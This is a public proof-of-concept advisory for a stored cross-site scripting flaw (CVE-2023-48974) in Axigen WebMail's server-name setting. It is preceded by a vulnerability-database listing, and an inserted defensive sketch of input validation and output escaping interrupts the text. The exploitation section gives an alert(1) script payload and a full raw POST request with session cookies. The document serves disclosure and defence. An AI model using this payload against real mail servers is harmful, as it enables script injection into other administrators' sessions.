| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2023-48974 | 8 Feb 2024 02:21 | – | circl |
| Axigen Cross-Site Scripting Vulnerability | 8 Feb 2024 00:00 | – | cnnvd |
| CVE-2023-48974 | 8 Feb 2024 00:00 | – | cve |
| CVE-2023-48974 | 8 Feb 2024 00:00 | – | cvelist |
| CVE-2023-48974 | 8 Feb 2024 01:15 | – | nvd |
| Cross site scripting | 8 Feb 2024 01:15 | – | prion |
| PT-2024-13666 · Axigen · Axigen Webmail | 7 Feb 2024 00:00 | – | ptsecurity |
| CVE-2023-48974 | 23 May 2025 04:42 | – | redhatcve |
| CVE-2023-48974 | 8 Feb 2024 00:00 | – | vulnrichment |

# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - RedTeamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older version of Axigen WebMail
# Tested on: firefox, chrome
# CVE: CVE-2023-48974
Description
The `serverName_input` parameter is vulnerable to stored cross-site
scripting (XSS) because its value is processed without sanitization or
filtering. An attacker can inject malicious code into this parameter, which
is then executed in the browsers of other users when they view the page
where the parameter is used. The issue affects authenticated administrators,
and it can be used to attack other administrators with more permissions.
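A defensive sketch of the fix class for the `serverName_input` issue described above, added here as an example and not Axigen's code: allow-list validation when the setting is saved, plus HTML output encoding when it is rendered. The function names, the `server-name` element id and the assumption that a server name must be a DNS hostname are hypothetical.

```javascript
// Added example, not Axigen code. Only the field name serverName_input comes
// from the advisory; every function and element id below is hypothetical.

// Assumption: a server name is a DNS hostname (RFC 1123 labels, max 253 chars).
const LABEL = /^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;

function isValidServerName(value) {
  if (typeof value !== 'string' || value.length === 0 || value.length > 253) return false;
  return value.split('.').every((label) => LABEL.test(label));
}

// Encode the characters that are significant in HTML text and quoted attributes.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Weak form: the stored value is concatenated into markup unchanged.
function renderServerNameUnsafe(stored) {
  return '<span id="server-name">' + stored + '</span>';
}

// Hardened form: encode at render time, whatever was stored earlier.
function renderServerName(stored) {
  return '<span id="server-name">' + escapeHtml(stored) + '</span>';
}

// Input-side check for a save handler: reject instead of storing.
function saveGlobalSettings(form, store) {
  const name = form.serverName_input;
  if (!isValidServerName(name)) {
    return { ok: false, error: 'serverName_input must be a valid hostname' };
  }
  store.serverName = name;
  return { ok: true };
}

// Constructed sample inputs: the value from the advisory and a normal hostname.
const store = {};
const rejected = saveGlobalSettings({ serverName_input: '<script>alert(1)</script>' }, store);
const accepted = saveGlobalSettings({ serverName_input: 'mail.example.com' }, store);
console.log(rejected, accepted, renderServerName('<script>alert(1)</script>'));
```

Output encoding is the control that matters for values already stored before validation was introduced; the input check only keeps new bad values out.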
Exploitation
1. Login as administrator
2. Navigate to "global settings"
3. Change server name to `<script>alert(1)</script>`
PoC of the POST request:
```
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true; WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D; webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true; public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52; menuLeftTopPosition=-754
Content-Type: multipart/form-data; boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="serverName_input"

<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"

axigen
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"

--SNIP--
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"

Save Configuration
-----------------------------41639384187581032291088896642--
```
#______________________________
#Vinnie McRae
#RedTeamer IT Security
#Blog: redteamer.de/blog-beitrag/